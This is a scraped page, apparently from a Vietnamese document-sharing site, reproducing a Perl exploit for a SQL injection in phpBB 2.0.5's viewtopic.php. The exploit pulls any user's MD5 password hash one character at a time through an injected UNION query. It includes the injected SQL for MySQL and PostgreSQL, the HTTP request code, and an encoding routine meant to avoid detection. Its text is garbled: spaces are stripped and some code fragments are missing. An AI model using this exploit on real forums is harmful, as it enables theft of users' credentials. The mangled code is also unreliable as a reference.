Phpbb 2.0.5 Sql Injection Password

There is a sql injection vuln which exists in /viewtopic.php file. The variable is $topic_id# which gets passed directly to sql server in query. Attacker could pass a special sql string which# can used to see md5 password hash for any user (!) for phpBB. This pass can be later usedwith
Nội dung trích xuất từ tài liệu:
Phpbb 2.0.5 Sql Injection PasswordPhpbb2.0.5SqlInjectionPassword,disclosureExploittrangnàyđãđượcđọc lần#!/usr/bin/perlw###phpBBpassworddisclosurevuln.#rickpatel##Thereisasqlinjectionvulnwhichexistsin/viewtopic.phpfile.Thevariableis$topic_id#whichgetspasseddirectlytosqlserverinquery.Attackercouldpassaspecialsqlstringwhich#canusedtoseemd5passwordhashforanyuser(!)forphpBB.Thispasscanbelaterusedwith#autologinorcrackedusingjohn.##Details:##thisischeckingdonefor$topic_idinviewtopic.php:##if(isset($HTTP_GET_VARS[POST_TOPIC_URL]))#{#$topic_id=intval($HTTP_GET_VARS[POST_TOPIC_URL]);#}#elseif(isset($HTTP_GET_VARS[topic]))#{#$topic_id=intval($HTTP_GET_VARS[topic]);#}##ok...noelsestatementatend#nowifGET[view]=newestandGET[sid]isset,thisquerygetsexecuted:##$sql=SELECTp.post_id#FROM.POSTS_TABLE.p,.SESSIONS_TABLE.s,.USERS_TABLE.u#WHEREs.session_id=$session_id#ANDu.user_id=s.session_user_id#ANDp.topic_id=$topic_id#ANDp.post_time>=u.user_lastvisit#ORDERBYp.post_timeASC#LIMIT1;##$topic_idgetspasseddirectytoquery.Sohowcanweusethistodosomethingimportant?Well#Idecidedtouseunionandcreateasecondquerywillgetussomethinguseful.Therewerecoupleof#problemsiraninto.first,phpBBonlycaresaboutthefirstrowreturned.second,theselectforfirst#queryisp.post_idwhichisint,sointbecomesthetypereturnedforanyotherqueryinunion.third,#thereisrestofjunkatendANDp.post_time>=...Wetellmysqltoignorethatbyplacing/*atend#ofourinjectedquery.Sowhatquerycanwemakethatreturnsonlyint?#thisone=>selectord(substring(user_password,$index,1))fromphpbb_userswhereuser_id=$uid#Thenallwehavetodoisquery32timeswhich$indexfrom132andwegetordvalueofallcharsof#md5hashpassword.##Ihaveonlytestedthiswithmysql4andpgsql.Mysql3.xdoesnotsupportunionssoyouwouldhavetotweak#thequerytodoanythinguseful.##Thisscriptisforeducationalpurposeonly.Pleasedontuseittodoanythingelse.##ToFixthisbug:http://www.phpbb.com/phpBB/viewtopic.php?t=112052useIO::Socket;$remote=shift||localhost;$view_topic=shift||/phpBB2/viewtopic.php;$uid=shift||2;$port=80;$dbtype=mysql4;#mysql4orpgsqlprintTryingtogetpasswordhashforuid$uidserver$remotedbtype:$dbtype\n;$p=;for($index=1;$indexnew(PeerAddr=>$remote,PeerPort=>$port,Proto=>tcp,Type=>SOCK_STREAM)ordieCouldntconnectto$remote:$port:$@\n;$str=GET$view_topic.?sid=1&topic_id=1.random_encode(make_dbsql()).&view=newest.HTTP/1.0\n\n;print$socket$str;print$socketCookie:phpBB2mysql_sid=1\n;#replacethisforpgsqlorremoveitprint$socketHost:$remote\n\n;while($answer=){if($answer=~/Location:.*\x23(\d+)/)#MatchestheLocation:viewtopic.php?p=#{$p.=chr($1);}}close($socket);}print\nMD5Hashforuid$uidis$p\n;#randomencodestr.helpsavoiddetectionsubrandom_encode{$str=shift;$ret=;for($i=0;$isubmake_dbsql{if($dbtypeeqmysql4){returnunionselectord(substring(user_password,.$index.,1))fromphpbb_userswhereuser_id=$uid/*;}elsif($dbtypeeqpgsql){return;selectascii(substring(user_passwordfrom$indexfor1))aspost_idfromphpbb_postsp,phpbb_usersuwhereu.user_id=$uidorfalse;}else{return;}}